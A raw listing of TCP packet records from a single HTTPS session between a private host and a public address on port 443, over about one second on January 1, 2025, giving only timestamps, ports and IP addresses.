Jan 1, 2025 17:10:07.381606102 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.381688118 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.381692886 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.381707907 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.381733894 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.381736994 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.381762981 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.381769896 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.382074118 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.382090092 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.382148981 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.382158995 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.382175922 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.382215977 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.382263899 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.382280111 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.382320881 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.382328033 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.382339954 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.382369041 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.383320093 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.383336067 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.383407116 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.383414030 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.383443117 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.383465052 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.388158083 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.388174057 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.388237000 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.388243914 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.388529062 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.388547897 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.388586044 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.388592005 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.388612032 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.388638973 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.388855934 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.388871908 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.388906002 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.388912916 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.388926983 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.388951063 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.472322941 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.472342014 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.472390890 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.472414970 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.472430944 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.472465992 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.472505093 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.472624063 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.472639084 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.472695112 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.472702026 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.473014116 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.473031044 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.473073959 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.473081112 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.473109961 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.473812103 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.473825932 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.473881006 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.473889112 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.480274916 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.480298996 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.480333090 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.480340004 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.480351925 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.480611086 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.480624914 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.480670929 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.480680943 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.480706930 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.480989933 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.481008053 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.481050014 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.481057882 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.481080055 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.531119108 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.562700033 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.562721968 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.562789917 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.562800884 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.562841892 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.563018084 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.563033104 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.563076973 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.563083887 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.563112020 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.563121080 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.563282967 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.563298941 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.563353062 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.563359976 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.563414097 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.563637018 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.563652039 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.563709974 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.563716888 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.563765049 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.564265966 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.564281940 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.564337015 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.564344883 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.565723896 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.570828915 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.570844889 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.570895910 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.570908070 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.570920944 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.570945978 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.571147919 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.571163893 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.571199894 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.571206093 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.571217060 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.571254969 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.571566105 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.571579933 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.571643114 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.571650028 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.571702957 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.653337955 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.653354883 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.653410912 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.653430939 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.653492928 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.653493881 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.653506041 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.653531075 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.653551102 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.653579950 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.653585911 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.653628111 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.653853893 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.653867006 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.653911114 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.653918982 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.654155016 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.654172897 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.654211044 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.654217958 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.654228926 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.654259920 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.654792070 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.654804945 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.654855013 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.654864073 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.655061007 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.661703110 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.661722898 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.661765099 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.661773920 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.661798000 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.661815882 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.662019968 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.662034988 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.662167072 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.662173986 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.662220001 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.662321091 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.662343025 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.662389040 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.662396908 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.665226936 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.743942022 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.743958950 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.744014025 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.744025946 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.744040966 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.744066000 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.744158983 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.744174957 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.744225979 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.744231939 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.744330883 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.744529963 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.744543076 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.744579077 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.744584084 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.744595051 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.744625092 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.744693995 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.744709015 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.744751930 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.744762897 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.744780064 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.744798899 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.745284081 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.745299101 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.745348930 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.745354891 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.745543957 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.752311945 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.752327919 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.752384901 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.752393961 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.752403975 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.752430916 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.752526999 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.752542019 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.752583027 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.752590895 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.752603054 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.752629042 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.752948999 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.752964020 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.753005981 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.753012896 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.753031015 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.753051043 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.834563017 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.834583044 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.834666014 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.834677935 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.834747076 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.834770918 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.834804058 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.834810972 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.834824085 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.834857941 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.835167885 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.835181952 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.835252047 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.835259914 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.835335970 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.836261034 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.836278915 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.836323977 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.836334944 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.836364031 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.836370945 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.839087963 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.839104891 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.839162111 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.839169979 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.839433908 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.842803955 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.842818975 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.842904091 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.842911959 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.842956066 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.843135118 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.843154907 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.843223095 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.843230009 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.843429089 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.843452930 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.843482018 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.843487978 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.843503952 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.845566034 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.926129103 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.926146030 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.926212072 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.926223040 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.926256895 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.926273108 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.926301956 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.926326036 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.926357985 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.926364899 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.926393986 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.926413059 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.927248955 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.927263975 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.927337885 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.927345991 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.927484035 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.927504063 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.927546978 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.927553892 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.927582979 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.927596092 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.929711103 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.929725885 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.929780006 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.929788113 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.933492899 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.933584929 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.933603048 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.933644056 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.933650970 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.933665991 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.933691978 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.933939934 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.933958054 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.934014082 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.934020996 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.934094906 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.934113979 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.934154034 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.934159994 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.934170961 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.934201956 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.020150900 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.020169973 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.020246029 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.020252943 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.020276070 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.020307064 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.020343065 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.020347118 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.020358086 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.020389080 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.020395041 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.020440102 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.020446062 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.020462036 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.020481110 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.020520926 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.020528078 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.020540953 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.020900965 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.020921946 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.020977020 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.020983934 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.020997047 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.024043083 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.024070024 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.024122953 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.024136066 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.024168015 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.024415970 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.024430037 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.024483919 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.024492025 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.024744034 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.024761915 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.024801016 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.024807930 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.024820089 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.077929974 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.110455036 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.110476017 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.110542059 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.110553026 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.110594034 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.110702991 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.110718012 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.110765934 CET	49733	443	192.168.2.4	188.114.96.3
